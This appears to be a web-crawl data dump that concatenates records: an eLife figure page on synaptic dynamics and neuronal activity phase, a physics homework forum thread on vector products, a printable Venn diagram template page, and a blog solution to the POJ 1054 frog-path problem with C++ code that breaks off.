{"ft_lang_label":"__label__en","ft_lang_prob":0.944428,"math_prob":0.9891048,"size":2708,"snap":"2021-04-2021-17","text_gpt3_token_len":554,"char_repetition_ratio":0.15828402,"word_repetition_ratio":0.008421052,"special_character_ratio":0.1971935,"punctuation_ratio":0.08795411,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9919882,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,4,null,4,null,8,null,8,null,4,null,null,null,null,null,4,null,4,null,4,null,null,null,4,null,4,null,4,null,8,null,8,null,8,null,8,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-04-20T15:46:44Z\",\"WARC-Record-ID\":\"<urn:uuid:5f3f65d6-ff39-40ef-b0e8-76a997a29565>\",\"Content-Length\":\"22001\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5abef30e-617e-4f28-91f3-77cf92a2d3d0>\",\"WARC-Concurrent-To\":\"<urn:uuid:c8676430-ebbd-45bf-853e-a77d858e5f3e>\",\"WARC-IP-Address\":\"96.125.173.110\",\"WARC-Target-URI\":\"https://www.conservapedia.com/Gauss%27s_Law\",\"WARC-Payload-Digest\":\"sha1:X6OPQATWZISJA7DZDFB7ALONG3A7ZGMI\",\"WARC-Block-Digest\":\"sha1:3QMKGMV22V77LTGB2A3Z3LU52EQFZCJV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-17/CC-MAIN-2021-17_segments_1618039476006.77_warc_CC-MAIN-20210420152755-20210420182755-00450.warc.gz\"}"}
https://elifesciences.org/articles/46911/figures
[ "# Short-term synaptic dynamics control the activity phase of neurons in an oscillatory network\n\n1. New Jersey Institute of Technology and Rutgers University, United States\n2. New Jersey Institute of Technology, United States\n9 figures\n\n## Figures\n\nFigure 1", null, "Latency constancy and phase constancy as a function of period. (A1) Schematic diagram showing that a follower neuron (F) strongly inhibited by a bursting oscillatory neuron (O) with period P can produce rebound bursts with the same period at a latency Δt. (A2) If the period of O changes to a new value (P2), the new F burst latency (Δt2) typically falls between two extremes: it could stay constant (top trace) or change proportionally to P2, so that the burst phase (Δt/P) remains constant (middle trace). (B) Example traces of the pyloric pacemaker PD neuron and the follower LP neuron represent the O and F relationship in panel A. Here, the PD neuron is voltage clamped and a pre-recorded waveform of the same neuron is used to drive this neuron to follow different cycle periods. The LP neuron follows the same period because of the synaptic input it receives. (C) A measurement of the LP neuron burst onset time (Δt) with respect to the onset of the PD neuron burst shows that Δt falls between the two limits of constant latency and constant phase. Dotted curves represent constant latency matched to the latencies at the two extreme P values. https://doi.org/10.7554/eLife.46911.002\nFigure 2", null, "Inputs to the LP neuron influence burst time, spike number and interval. (A) Simultaneous intracellular recording of the LP neuron and extracellular recording of the lateral ventricular nerve (lvn), containing the axons of the LP, PD and PY neurons (arrows). Period (P) and the burst onset time (Δt) of the LP neuron are defined in reference to the pacemaker group (PD) burst. (B) Blocking the AB and PY synaptic inputs (10 µM picrotoxin) to the LP neuron disrupts its bursting oscillations. (C) The LP neuron, in picrotoxin, was driven with a noise current input (Inoise) for 60 min. In response, the LP neuron produced an irregular pattern of bursting. Specific inter-burst intervals (IBIs) were tagged and used for burst-triggered averaging. (D) Example of burst-trigger-averaged input current (IBTA, green). Individual traces are shown in gray. (E) For each IBI (300, 500, 700, 900 ms), IBTA was calculated and normalized to the (negative) peak value of IBTA for IBI = 300 ms. Different traces in each panel show the IBTA of different preparations. (F) The mean (across preparations) of the normalized IBTAs shown in panel E. (G) Traces in panel F normalized by IBI. (H–K) Four parameters define the shape of the IBTA: peak amplitude Iamp (H), peak phase Δpeak (I), slopeup (J) and slopedown (K) across preparations. IBI had a significant effect on amplitude Iamp (p<0.001), peak phase Δpeak (p<0.001), slopeup (p<0.001) and slopedown (p=0.002). https://doi.org/10.7554/eLife.46911.003\n###### Figure 2—source data 1\n\nThis Excel file contains four sheets, including all measured attributes of the burst-triggered average current (IBTA) for different IBIs (N = 23) as shown in Figure 2H–2K.\n\nFigure 3", null, "Cycle period and synaptic strength affect the phase of LP burst onset in opposite directions. (A) The synaptic input to the LP neuron was measured by voltage clamping it at a holding potential of −50 mV during ongoing oscillations. The onset of the pacemaker (AB/PD) activity is seen as a kink in the synaptic current (ILP, blue). Dashed line: 0 nA. (B) Synaptic input averaged across (last 5 of 30) cycles from nine different LP neurons. Traces are aligned to the onset of the PD neuron burst (dotted vertical red line; see panel A), normalized by the cycle period and terminated at the end of the downslope (coincident with the first LP action potential when present). The blue trace shows the average. (C) An example of the LP neuron driven by the realistic synaptic waveform in dynamic clamp. The burst onset time (Δt) was measured relative to the AB/PD onset and used to measure the LP phase (φLP). gmax denotes the conductance amplitude. (D) Mean φLP (N = 9 preparations) shown as a function of P and fit with the function given by Equation (8) (fit values τs=26.0 ms, g*=0.021 µS and Δpeak·DC = 0.43). (E) Mean φLP plotted against gmax also shown with the fit to Equation (8) . (F) Heat map, obtained from fitting Equation (8) to the data in panels D and E, shows φLP as a function of both gmax and P. Black curves show the level sets of phase constancy for three values of φLP (0.47, 0.49, and 0.52). https://doi.org/10.7554/eLife.46911.005\nFigure 4", null, "The constant duty cycle of synaptic conductance is a major factor in phase maintenance. (A) The change in φLP values with P are compared with the constant phase (solid curve) and constant latency (dashed curve) extremes. Lime traces show the usual values of φLP, calculated from the LP burst onset latency with respect to the onset of the PD burst. Lavender traces show φLP calculated from the LP burst onset latency with respect to the end of the PD burst. Data shown are the same as in Figure 3D for gmax = 0.4 µS. (B) Schematic diagram shows the latency of LP burst onset measured with respect to the (estimated) onset and end of the PD burst in the dynamic clamp experiments (see Materials and methods). Bottom panel shows the synaptic current waveform measured in the voltage-clamped LP neuron during ongoing pyloric activity. Top panel shows the dynamic clamp injection of the synaptic conductance waveform into the LP neuron. The current waveform of the bottom panel is aligned to the conductance waveform of the top panel for the comparison used in determining the PD burst onset and end in the top panel. https://doi.org/10.7554/eLife.46911.006\nFigure 5", null, "Four parameters describing synaptic shape were varied in the experimental paradigm. (A) A triangle-shaped conductance was used to mimic the synaptic input to the LP neuron. (B) The triangular waveform can be described by period (P), duration (Tact), peak time (tpeak) and amplitude (gmax). (C) In dynamic clamp runs, the synapse duration Tact was kept constant at 300 ms (C-Dur) or maintained at a constant duty cycle (Tact/P) of 0.3 (C–DC) across all values of P. (D) Intracellular voltage recording of the LP neuron during a dynamic clamp stimulation run using the triangle conductance (in picrotoxin). The burst onset time (Δt, calculated in reference to the synaptic conductance onset) was used to calculate the activity phase (φLP = Δt/P). https://doi.org/10.7554/eLife.46911.007\nFigure 6", null, "The LP burst onset phase decreases as a function of P, but increases as a function of gmax and Δpeak. Periodic injection of an inhibitory triangular waveform conductance into the LP neuron (in picrotoxin) produced bursting activity from which φLP was calculated. The parameters gmax, Δpeak and P were varied across runs for both C-Dur and C-DC cases. (A) φLP decreases as a function of P. (A1) Intracellular recording of an LP neuron showing a C-DC conductance input across five periods. (A2) φLP for the example shown in A1 plotted as a function of P (for gmax = 0.4 μS, Δpeak=0.5) for both C-Dur and C-DC cases. φLP decreases rapidly with P and the drop is larger for the C-Dur case. (A3) φLP decreased with P in both the C-DC case (three-way RM ANOVA, p<0.001, F = 100.7) and the C-Dur case (three-way RM ANOVA, p<0.001, F = 466.4) for all values of Δpeak. The range of φLP drop was greater for the C-Dur case compared to the C-DC case. (B) φLP increases as a function of gmax. (B1) Intracellular recording of an LP neuron showing the conductance input across three values of gmax. (B2) φLP for the example shown in B1 plotted as a function of P (for p=500 ms, Δpeak=0.25) shows a small increase for both C-Dur and C-DC cases. (B3) φLP increased with gmax in almost all trials for both C-DC and C-Dur cases and all values of Δpeak. (C) φLP increases as a function of Δpeak. (C1) Intracellular recording of the LP neuron showing the conductance input for five values of Δpeak. (C2) φLP for the example neuron in C1 plotted as a function of Δpeak (for p=500 ms, gmax = 0.4 μS) for both C-DC and C-Dur cases. (C3) φLP increased with Δpeak for both C-DC and C-Dur cases and for all values of gmax. In all panels, error bars show standard deviation. https://doi.org/10.7554/eLife.46911.008\nFigure 7", null, "Sensitivity analysis shows that φLP increases more effectively if gmax and Δpeak increase together. (A) The sensitivity of φLP to local changes in gmax and Δpeak was averaged across all values of P for the C-DC case. Sensitivity was largest if both parameters were increased together (gmax + Δpeak) and smallest if they were varied in opposite directions (gmax - Δpeak; one-way RM-ANOVA, p<0.001, F = 3.330). (B) The same sensitivity analysis in the C-Dur case shows similar results (one-way RM-ANOVA, p<0.001, F = 2.892). In both panels, error bars show standard deviation. https://doi.org/10.7554/eLife.46911.009\n###### Figure 7—source data 1\n\nThis Excel file contains two sheets for the C-DC and C-Dur cases.\n\nThese sheets include all sensitivity values for each value of P, at each gmax and each Δpeak in all eight directions: (+gmax, +Δpeak, –gmax, –Δpeak,+gmax & +Δpeak, –gmax & –Δpeak,+gmax & –Δpeak,+gmax & –Δpeak). Figure 7 shows the sensitivities, averaged across all P values, and averaged across aligned directions: [+gmax and –gmax]; [+Δpeak and –Δpeak]; [+gmax & +Δpeak and –gmax & –Δpeak]; [+gmax & –Δpeak and +gmax & –Δpeak].\n\nFigure 8", null, "Simultaneous increase of both Δpeak and gmax across their range of values can produce phase maintenance across a large P range in the C-DC case and a much smaller P range in the C-Dur case. (A) Heat map plots of the function Φ (see Materials and methods), plotted for the range of values of P and Δpeak and 4 values of gmax for the C-DC (A1) and C-Dur (A2) cases. The white curves show the level set of φLP=0.34, shown as an example of phase constancy. The color maps are interpolated from sampled data (see Materials and methods; N = 9 experiments). The locations of the sampled data are marked by black dots. (B) Heat map for the level sets φLP=0.34 for the C-DC (B1) and C-Dur (B2) cases. Range of colors in each panel indicate the range of P values for which φLP could remain constant at 0.34 for each case, as indicated by the gray arrows on the side of the heatmap color legend. (C) The range (ΔP) of P values for which φLP could remain constant at any value between 0.2 and 0.8 for the C-DC (C1) and C-Dur cases (C2). Filled circles show the values shown in panel B. The LP neuron cannot achieve φLP values below 0.3 in the C-DC case. For φLP values between 0.3 and ~0.65, the range was larger in C-DC case. https://doi.org/10.7554/eLife.46911.011\nFigure 9", null, "Model prediction of the range of phase constancy. (A) For the C-DC case, a constant phase of φLP=0.34 can be maintained across a range of cycle periods P when gmax is constant (at 335 nS; blue plane) and Δpeak varies from 0 to 1 according to Equation (11) (blue), or when Δpeak is fixed (at 0.5; green plane) and gmax varies from 200 to 800 nS according to Equation (10). Alternatively, gmax and Δpeak can covary to maintain phase, as in a depressing synapse, where gmax varies with P according to Equation (16) , and Δpeak is calculated for each P and gmax value according to Equation (11). As seen in the 2D coordinate-plane projections of the 3D graph (right three graphs), the range of P values for which phase constancy is achieved is largest when gmax and Δpeak covary (dotted lines show limits of P for phase constancy). The depressing synapse conductance value is chosen to be 335 nS at P = 1 s. (B, C) A comparison between the C-DC and C-Dur cases shows that in the latter case a constant phase of φLP can be maintained across a larger range of P values when Δpeak increases with P (and gmax is fixed at 400 nS) according to Equation (11). The relationship of Δpeak and P is shown in B for φLP=0.34. (C) shows the range of P values (ΔP) of cycle periods for which phase remains constant at any value of φLP. If gmax also varies with P, as in a depressing synapse (red; Equation (16)), the range of P values for which phase is constant is further increased. (Dotted line: φLP=0.34.). https://doi.org/10.7554/eLife.46911.012\n\nA two-part list of links to download the article, or parts of the article, in various formats." ]
[ null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig1-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig2-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig3-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig4-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig5-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig6-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig7-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig8-v2.tif/full/617,/0/default.jpg", null, "https://iiif.elifesciences.org/lax/46911%2Felife-46911-fig9-v2.tif/full/617,/0/default.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.73202276,"math_prob":0.9270287,"size":854,"snap":"2023-14-2023-23","text_gpt3_token_len":223,"char_repetition_ratio":0.14941177,"word_repetition_ratio":0.18487395,"special_character_ratio":0.264637,"punctuation_ratio":0.11515152,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9814204,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18],"im_url_duplicate_count":[null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-31T08:42:03Z\",\"WARC-Record-ID\":\"<urn:uuid:cab33a37-cb51-4956-ab1c-00a69c46c9cf>\",\"Content-Length\":\"247638\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6e1aac49-fb0a-4499-86d1-4958928c323f>\",\"WARC-Concurrent-To\":\"<urn:uuid:1f4071c8-fd62-4a90-99cf-c27f2e327378>\",\"WARC-IP-Address\":\"151.101.66.217\",\"WARC-Target-URI\":\"https://elifesciences.org/articles/46911/figures\",\"WARC-Payload-Digest\":\"sha1:EOUHGV3EY4RZOA2FUNXWG4UMYFKWF2QU\",\"WARC-Block-Digest\":\"sha1:ZRQ3X4NXP3XQT5N567OKNN4FDFJMXAHT\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296949598.87_warc_CC-MAIN-20230331082653-20230331112653-00286.warc.gz\"}"}
https://www.physicsforums.com/threads/vectors-dot-product-and-cross-product-help.435269/#post-2918527
[ "# Vectors dot product and cross product help\n\n## Homework Statement\n\nVectors A and B (both with the lines over it) lie in an xy plane. Vector A has magnitude 8 and angle 130 degrees, Vector B has components Bx=-7.72 and By=-9.2.\na)What is 5(vector A) dot vector B?\nb)What is 4(Vector A) cross 3(vector B) in unit vector notation and magnitude angle notation with spherical coordinates?\n\n## Homework Equations\n\nVector A dot Vector B=abcos(phi)\nOther vector equations that can apply to this that I don't know maybe...\n\n## The Attempt at a Solution\n\nI figured that I try to find the vector B by doing the Pythagorean theorem with the two components of B and I get -12 as magnitude. After that I'm not even sure what to do, like for the 5(vector A) do I multiply the angle and magnitude by 5 then do the Vector A dot Vector B=abcos(phi) equation? Same question applies to b and how do I turn the magnitude and the angle into unit vector notation and magnitude angle notation? Thanks in advance.\n\nEDIT: Forget A, I solved it\n\nLast edited:\n\ngabbagabbahey\nHomework Helper\nGold Member\n\n## Homework Statement\n\nVectors A and B (both with the lines over it) lie in an xy plane. Vector A has magnitude 8 and angle 130 degrees, Vector B has components Bx=-7.72 and By=-9.2.\na)What is 5(vector A) dot vector B?\nb)What is 4(Vector A) cross 3(vector B) in unit vector notation and magnitude angle notation with spherical coordinates?\n\n## Homework Equations\n\nVector A dot Vector B=abcos(phi)\nOther vector equations that can apply to this that I don't know maybe...\n\n## The Attempt at a Solution\n\nI figured that I try to find the vector B by doing the Pythagorean theorem with the two components of B and I get -12 as magnitude. After that I'm not even sure what to do, like for the 5(vector A) do I multiply the angle and magnitude by 5 then do the Vector A dot Vector B=abcos(phi) equation? Same question applies to b and how do I turn the magnitude and the angle into unit vector notation and magnitude angle notation? Thanks in advance.\n\nEDIT: Forget A, I solved it\n\nThe easiest way to do part b) is to start by finding [tex]A_x[/itex] and [tex]A_y[/itex]. As a hint on finding those components, consider [tex]\\vec{A}\\cdot\\vec{e}_x[/itex] and [tex]\\vec{A}\\cdot\\vec{e}_y[/itex]", null, "Where does the ex and ey come from?\n\ngabbagabbahey\nHomework Helper\nGold Member\nWhere does the ex and ey come from?\n\nI'm using them to represent the Cartesian unit vectors. You might be more used to seeing i and j....different authors use different notations for the same quantities, so it's worth familiarizing yourself with common notations." ]
[ null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8994891,"math_prob":0.76048416,"size":987,"snap":"2021-31-2021-39","text_gpt3_token_len":253,"char_repetition_ratio":0.17293999,"word_repetition_ratio":0.033519555,"special_character_ratio":0.2532928,"punctuation_ratio":0.08530806,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99975747,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-26T13:50:52Z\",\"WARC-Record-ID\":\"<urn:uuid:52fb6346-1651-4076-8eda-bc0ec80aa28d>\",\"Content-Length\":\"69631\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:212d9dc4-47d2-4d3f-82e9-a71b11afdf0c>\",\"WARC-Concurrent-To\":\"<urn:uuid:3eea3bf0-df11-4813-8deb-bc7d75d56596>\",\"WARC-IP-Address\":\"172.67.68.135\",\"WARC-Target-URI\":\"https://www.physicsforums.com/threads/vectors-dot-product-and-cross-product-help.435269/#post-2918527\",\"WARC-Payload-Digest\":\"sha1:CDCGQFPFJLILSBFV55X56HVR4B4PQCVP\",\"WARC-Block-Digest\":\"sha1:KRYPAZCWTD4S75VPQVNA4ADIIQM3HVUK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057861.0_warc_CC-MAIN-20210926114012-20210926144012-00415.warc.gz\"}"}
https://kidsworksheetfun.com/venn-diagram-printable-3-circles/
[ "", null, "# Venn Diagram Printable 3 Circles\n\n2 circle venn diagram template. We have 2 3 and 4 circle venn diagrams to suit nearly any lesson plan.", null, "Venn Diagram Maker Venn Diagram Template Blank Venn Diagram Venn Diagram Printable\n\n### All of the number values for each section of the diagram have been given to us in the question.", null, "Venn diagram printable 3 circles. Get a free printable venn diagram template to create your own venn diagram for 2 3 or 4 circles. 3 5 2003 8 45 57 am. This three circle venn diagram worksheet is perfect for visually comparing and contrasting any three topics.\n\nBlank 3 circle venn diangram. Celebrate john venn s birthday. This website and its content is subject to our terms and conditions.\n\nRepresent these results using a three circle venn diagram the type of three circle venn diagram we will need is the following. Simply click on a link below and print as many templates as you need. 4 circle venn diagram template.\n\nHere you ll find printable venn diagram templates to use in the classroom. Three circle venn diagrams are a step up in complexity from two circle. Venn diagram templates are available for pdf and word.\n\nStudents celebrate the birth of english logician philosopher and creator of the venn diagram by building community within the classroom by comparing and contrasting likes dislikes and characteristics about one another. This three circle word problem is an easy one. Grades k 12 printout graphic organizer.\n\nVenn diagram 3 circles. The different and similar labels help students identify how the diagram functions and the dotted lines and different shades of light gray along with the numeric category labels in thes. Passy s world of mathematics.\n\nVenn diagram 3 circles. A venn diagram uses overlapping circles to show how different sets are related to each other. 3 circle venn diagram template.\n\nIn a three circle venn diagram three different sets of information are able to be compared and it is where all three circles intersect that you are able to find the items that share all of the characteristics of each circle.", null, "Venn Diagram To Print Unique Template Of Venn Diagram In 2020 Venn Diagram Template Venn Diagram Venn Diagram Worksheet", null, "Venn Diagram Template Customize And Print Venn Diagram Template Venn Diagram Printable Venn Diagram", null, "Venn Diagram Template Editable Best Of Venn Diagram Maker In 2020 Venn Diagram Template Venn Diagram Venn Diagram Worksheet", null, "Image Result For 3 Circle Venn Diagram Template Venn Diagram Worksheet Venn Diagram Template Graphic Organizers", null, "Venn Diagram Template Editable Fresh Venn Diagram 3 Circles In 2020 Venn Diagram Template 3 Circle Venn Diagram Venn Diagram", null, "Venn Diagram Template Editable Beautiful Editable Venn Diagram Template Harddancefo In 2020 Venn Diagram Template Blank Venn Diagram Venn Diagram Worksheet", null, "3 Circle Venn Diagram Printable Venn Diagram Worksheet Venn Diagram Printable Venn Diagram", null, "Triple Venn Diagram Template Free Printable Venn Diagram Template Venn Diagram Venn Diagram Worksheet", null, "Image Result For 3 Circle Venn Diagram Template Venn Diagram Template Venn Diagram 3 Circle Venn Diagram", null, "3 Set Venn Diagram Venn Diagram Template 3 Circle Venn Diagram Venn Diagram", null, "Http Ndstudies Gov Sites Default File 2 Circle Venn Gif Venn Diagram Template Blank Venn Diagram Venn Diagram Printable", null, "3 Venn Diagram North Dakota Studies Venn Diagram Template 3 Circle Venn Diagram Blank Venn Diagram", null, "3 Way Venn Diagram Templates Venn Diagram Template 3 Circle Venn Diagram Venn Diagram", null, "30 Free Venn Diagram Template In 2020 Venn Diagram Template Venn Diagram 3 Circle Venn Diagram", null, "Compare And Contrast Chart Example Created Using A 3 Circle Venn Diagram Edit Text Chan Compare And Contrast Chart Venn Diagram Template Compare And Contrast", null, "Template Of Venn Diagram Diagram Site Venn Diagram Printable Venn Diagram Template Venn Diagram", null, "Blank Venn Diagram Classroom Jr Blank Venn Diagram Venn Diagram Template 3 Circle Venn Diagram", null, "Venn Diagram Mall Sok Pa Google Utbildning", null, "Three Circle Venn Diagram Template Venn Diagram Template Venn Diagram Graphic Organizers", null, "Previous post Preschool Worksheets Age 3-4", null, "Next post Simple Math Worksheets Pdf" ]
[ null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/2fc746f1584fa8f425c9444e5c8356ea.png", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/566d528cf33bd2afa44defd2894a219c.jpg", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/ffb59abc99034a3e96f4d8445f6fe848-1.jpg", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/ffb59abc99034a3e96f4d8445f6fe848.jpg", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/2fc746f1584fa8f425c9444e5c8356ea.png", null, "https://i.pinimg.com/736x/29/73/af/2973afb494db9d36e45883c90d15b07f.jpg", null, "https://i.pinimg.com/originals/bb/6d/c7/bb6dc787b9c5d61e8c05b87e25d219ba.png", null, "https://i.pinimg.com/originals/da/72/ab/da72abd0e4b134a08972220e2c557bce.jpg", null, "https://i.pinimg.com/736x/b1/84/03/b184035f6edd7a53a5b227287b85914c.jpg", null, "https://i.pinimg.com/originals/15/95/e0/1595e0ae8a2e3e361e99f3922dc6448e.gif", null, "https://i.pinimg.com/originals/a8/ca/32/a8ca329b3ee7beec2b544a34f475f23f.gif", null, "https://i.pinimg.com/originals/a3/d8/aa/a3d8aa31b54d97881589def98fd460de.jpg", null, "https://i.pinimg.com/originals/ce/48/63/ce486384bf30d21c43bb6dcf268f7002.png", null, "https://i.pinimg.com/originals/d3/90/26/d3902670375f50e19755250a8cc66e18.gif", null, "https://i.pinimg.com/originals/53/0d/47/530d47329127182ecfe6081c4d3c4b54.gif", null, "https://i.pinimg.com/originals/c5/73/18/c573180d0c11a78e54e27c316c13baf1.png", null, "https://i.pinimg.com/originals/6a/52/65/6a526508218c4a417d336a5887dbdd49.jpg", null, "https://i.pinimg.com/originals/b3/40/07/b3400754766e60203d795764abd0e11e.png", null, "https://i.pinimg.com/originals/cc/18/57/cc185767cd0ddc4045e64fc7c91453bc.png", null, "https://i.pinimg.com/originals/e0/67/88/e0678809f062902580d02a8a5433733d.gif", null, "https://i.pinimg.com/originals/92/35/62/9235626a2f9d56e2245f8582eb8d12e1.png", null, "https://i.pinimg.com/originals/ee/23/3d/ee233d083488d93897cc916f09ab1bb0.png", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/06/3c3a21f80c78a6fbf07279594bee8212-246x300.png", null, "https://kidsworksheetfun.com/wp-content/uploads/2022/05/b1d5580043afa26780795010b9c3a9d2-5-229x300.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63945276,"math_prob":0.77082807,"size":4017,"snap":"2022-27-2022-33","text_gpt3_token_len":856,"char_repetition_ratio":0.37528035,"word_repetition_ratio":0.18701701,"special_character_ratio":0.18421708,"punctuation_ratio":0.038404725,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9943222,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48],"im_url_duplicate_count":[null,4,null,2,null,2,null,2,null,4,null,8,null,3,null,7,null,null,null,5,null,5,null,null,null,6,null,6,null,6,null,4,null,7,null,null,null,3,null,null,null,3,null,5,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-06T20:11:47Z\",\"WARC-Record-ID\":\"<urn:uuid:504e8b10-da50-4bd9-8a1c-00888f99b9da>\",\"Content-Length\":\"115477\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a19ce7d2-6d88-482a-b8e8-26b9e6612540>\",\"WARC-Concurrent-To\":\"<urn:uuid:e7522a55-81ad-4952-8b0e-bc4183047238>\",\"WARC-IP-Address\":\"104.21.92.83\",\"WARC-Target-URI\":\"https://kidsworksheetfun.com/venn-diagram-printable-3-circles/\",\"WARC-Payload-Digest\":\"sha1:WUVUVZZLUHDH5P7PKN7S7OLWAOLNFOOZ\",\"WARC-Block-Digest\":\"sha1:HE5PUNLBUVWDZ7XZMZQUHPUKKYYMQUWC\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104676086.90_warc_CC-MAIN-20220706182237-20220706212237-00374.warc.gz\"}"}
https://www.dreamwings.cn/poj1054/4539.html
[ "# POJ 1054 The Troublesome Frog (枚举+优化)\n\nThe Troublesome Frog\n\n Time Limit: 5000MS Memory Limit: 100000K Total Submissions: 12167 Accepted: 3669 Case Time Limit: 500MS\n\nDescription\n\nIn Korea, the naughtiness of the cheonggaeguri, a small frog, is legendary. This is a well-deserved reputation, because the frogs jump through your rice paddy at night, flattening rice plants. In the morning, after noting which plants have been flattened, you want to identify the path of the frog which did the most damage. A frog always jumps through the paddy in a straight line, with every hop the same length:", null, "Your rice paddy has plants arranged on the intersection points of a grid as shown in Figure-1, and the troublesome frogs hop completely through your paddy, starting outside the paddy on one side and ending outside the paddy on the other side as shown in Figure-2:", null, "Many frogs can jump through the paddy, hopping from rice plant to rice plant. Every hop lands on a plant and flattens it, as in Figure-3. Note that some plants may be landed on by more than one frog during the night. Of course, you can not see the lines showing the paths of the frogs or any of their hops outside of your paddy ?for the situation in Figure-3, what you can see is shown in Figure-4:", null, "From Figure-4, you can reconstruct all the possible paths which the frogs may have followed across your paddy. You are only interested in frogs which have landed on at least 3 of your rice plants in their voyage through the paddy. Such a path is said to be a frog path. In this case, that means that the three paths shown in Figure-3 are frog paths (there are also other possible frog paths). The vertical path down column 1 might have been a frog path with hop length 4 except there are only 2 plants flattened so we are not interested; and the diagonal path including the plants on row 2 col. 3, row 3 col. 4, and row 6 col. 7 has three flat plants but there is no regular hop length which could have spaced the hops in this way while still landing on at least 3 plants, and hence it is not a frog path. Note also that along the line a frog path follows there may be additional flattened plants which do not need to be landed on by that path (see the plant at (2, 6) on the horizontal path across row 2 in Figure-4), and in fact some flattened plants may not be explained by any frog path at all.Your task is to write a program to determine the maximum number of landings in any single frog path (where the maximum is taken over all possible frog paths). In Figure-4 the answer is 7, obtained from the frog path across row 6.\n\nInput\n\nYour program is to read from standard input. The first line contains two integers R and C, respectively the number of rows and columns in your rice paddy, 1 <= R,C <= 5000. The second line contains the single integer N, the number of flattened rice plants, 3 <= N <= 5000. Each of the remaining N lines contains two integers, the row number (1 <= row number <= R) and the column number (1 <= column number <= C) of a flattened rice plant, separated by one blank. Each flattened plant is only listed once.\n\nOutput\n\nYour program is to write to standard output. The output contains one line with a single integer, the number of plants flattened along a frog path which did the most damage if there exists at least one frog path, otherwise, 0.\n\nSample Input\n\n6 7\n14\n2 1\n6 6\n4 2\n2 5\n2 6\n2 7\n3 4\n6 1\n6 2\n2 3\n6 3\n6 4\n6 5\n6 7\n\nSample Output\n\n7\n\n### 思路\n\n• 假如用两点的间距计算出i前面一个点不在界内,则重新挑选点进行计算。\n• 假如用这两点间距以及已知的最大踩坏作物的数量来计算,当前所允许的最后一个点不在界内,跳出。\n\n### AC 代码\n\n#include <iostream>\n#include<cstdio>\n#include<cstring>\n#include<queue>\n#include<stdio.h>\n#include<algorithm>\n#include<stack>\nusing namespace std;\n\n#define MAXN 5010\nbool G[MAXN][MAXN];\nint row,col,N;\n\nstruct node\n{\nint x,y;\nbool operator<(const node &o)\n{\nif(x==o.x)return y<o.y;\nreturn x<o.x;\n}\n} a[MAXN];\n\nbool judge(int x,int y) //判断当前点是否在界内\n{\nif(x>0&&x<=row&&y>0&&y<=col)\nreturn true;\nreturn false;\n}\n\nint solve()\n{\nint ans=2;\nfor(int i=0; i<N; i++)\nfor(int j=i+1; j<N; j++)\n{\nint dx=a[j].x-a[i].x; //间距\nint dy=a[j].y-a[i].y;\nif(a[j].x+(ans-2)*dx>row) //如果试探之后发现青蛙一定会在界外,则剪枝\nbreak;\nif(a[j].y+(ans-2)*dy>col||a[j].y+(ans-2)*dy<1)\ncontinue;\nif(judge(a[i].x-dx,a[i].y-dy)) //如果前一个点也在范围内,则排除\ncontinue;\nint t=1;\nint 